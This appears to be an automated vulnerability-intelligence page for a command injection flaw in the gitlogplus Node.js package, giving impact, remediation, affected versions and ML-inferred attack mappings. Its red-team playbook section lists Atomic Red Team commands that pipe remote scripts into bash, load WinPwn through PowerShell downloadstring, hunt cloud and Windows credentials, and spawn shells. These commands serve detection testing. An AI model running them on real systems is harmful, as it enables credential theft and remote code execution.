CVE-2021-23412
Overview
The vulnerability in gitlogplus is a command injection flaw arising from improper sanitization of user-supplied options attributes. These options are directly appended to system commands executed by the package without validation or escaping, enabling injection of arbitrary shell commands. This issue affects the core command execution functionality within gitlogplus versions 3.1.3 through 3.1.7.
Vulnerability Description
All versions of package gitlogplus are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the host system with the privileges of the gitlogplus process. No user interaction or authentication is required (AV:N/AC:H/PR:N/UI:N), making exploitation feasible over a network. Successful exploitation can lead to full system compromise, data theft, or service disruption, severely impacting business operations relying on gitlogplus.
Solution
Users should upgrade gitlogplus to a fixed version beyond 3.1.7 as recommended by the Snyk advisory (SNYK-JS-GITLOGPLUS-1315832). The vendor has addressed the command injection by implementing proper input sanitization in later releases. Refer to https://snyk.io/vuln/SNYK-JS-GITLOGPLUS-1315832 for detailed patch instructions and version updates. No specific workaround is provided; upgrading is the primary remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the gitlogplus package is a critical command injection flaw that arises from improper handling of user-supplied input. Specifically, the issue occurs when options attributes are appended to commands executed by the application without adequate sanitization. This lack of input validation allows an attacker to craft malicious input that can be executed on the server, leading to arbitrary command execution. The vulnerability affects multiple versions of the gitlogplus package, which is utilized in Node.js environments, making it a significant concern for developers and organizations relying on this tool for managing Git logs.
Attack vectors exploiting this vulnerability can vary widely, but they typically involve an attacker manipulating input fields that are processed by gitlogplus. For instance, if an application using gitlogplus allows users to specify command options through a web interface or API, an attacker could inject malicious commands through these fields. Once the input is processed, the attacker could execute arbitrary system commands, potentially gaining unauthorized access to the underlying operating system or executing harmful scripts. This exploitation could occur in various scenarios, such as during automated deployments, continuous integration pipelines, or even through user-facing applications that utilize gitlogplus for log management.
The real-world impact of this vulnerability is profound, especially for organizations that rely on gitlogplus for critical operations. Successful exploitation could lead to severe consequences, including data breaches, system compromise, or service disruptions. The high CVSS score of 9.8 indicates that the vulnerability poses a significant risk, particularly in environments where gitlogplus is integrated into larger systems or workflows. Organizations could face not only financial losses due to downtime and recovery efforts but also reputational damage if sensitive data is exposed or if customer trust is eroded due to security incidents.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should conduct thorough code reviews and vulnerability assessments of applications utilizing gitlogplus to identify any instances of command injection. Automated tools can assist in scanning for insecure input handling practices. Additionally, organizations should ensure that they are using the latest versions of the gitlogplus package, as updates may include necessary patches to address security flaws. Employing security best practices, such as input validation, output encoding, and the principle of least privilege, can further reduce the risk of exploitation. Furthermore, implementing web application firewalls (WAFs) can help filter out malicious input before it reaches the application layer.
In conclusion, the command injection vulnerability in gitlogplus represents a serious threat to the security of applications that utilize this package. The potential for arbitrary command execution can lead to significant operational and reputational risks for affected organizations. By understanding the technical details of the vulnerability, recognizing possible attack vectors, and employing robust detection and mitigation strategies, organizations can better safeguard their systems against this and similar vulnerabilities in the future. Proactive security measures and a commitment to maintaining secure coding practices are essential in today’s threat landscape.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gitlogplus Project | Gitlogplus | 3.1.3 |
cpe:2.3:a:gitlogplus_project:gitlogplus:3.1.3:*:*:*:*:node.js:*:*
|
|
|
Gitlogplus Project | Gitlogplus | 3.1.4 |
cpe:2.3:a:gitlogplus_project:gitlogplus:3.1.4:*:*:*:*:node.js:*:*
|
|
|
Gitlogplus Project | Gitlogplus | 3.1.5 |
cpe:2.3:a:gitlogplus_project:gitlogplus:3.1.5:*:*:*:*:node.js:*:*
|
|
|
Gitlogplus Project | Gitlogplus | 3.1.6 |
cpe:2.3:a:gitlogplus_project:gitlogplus:3.1.6:*:*:*:*:node.js:*:*
|
|
|
Gitlogplus Project | Gitlogplus | 3.1.7 |
cpe:2.3:a:gitlogplus_project:gitlogplus:3.1.7:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-23412 |
| snyk.io |
GitHub CVE
x_refsource_MISC
|
https://snyk.io/vuln/SNYK-JS-GITLOGPLUS-1315832 |
| hackerone.com |
GitHub CVE
x_refsource_MISC
|
https://hackerone.com/reports/808942 |
| npmjs.com |
GitHub CVE
x_refsource_MISC
|
https://www.npmjs.com/package/gitlogplus |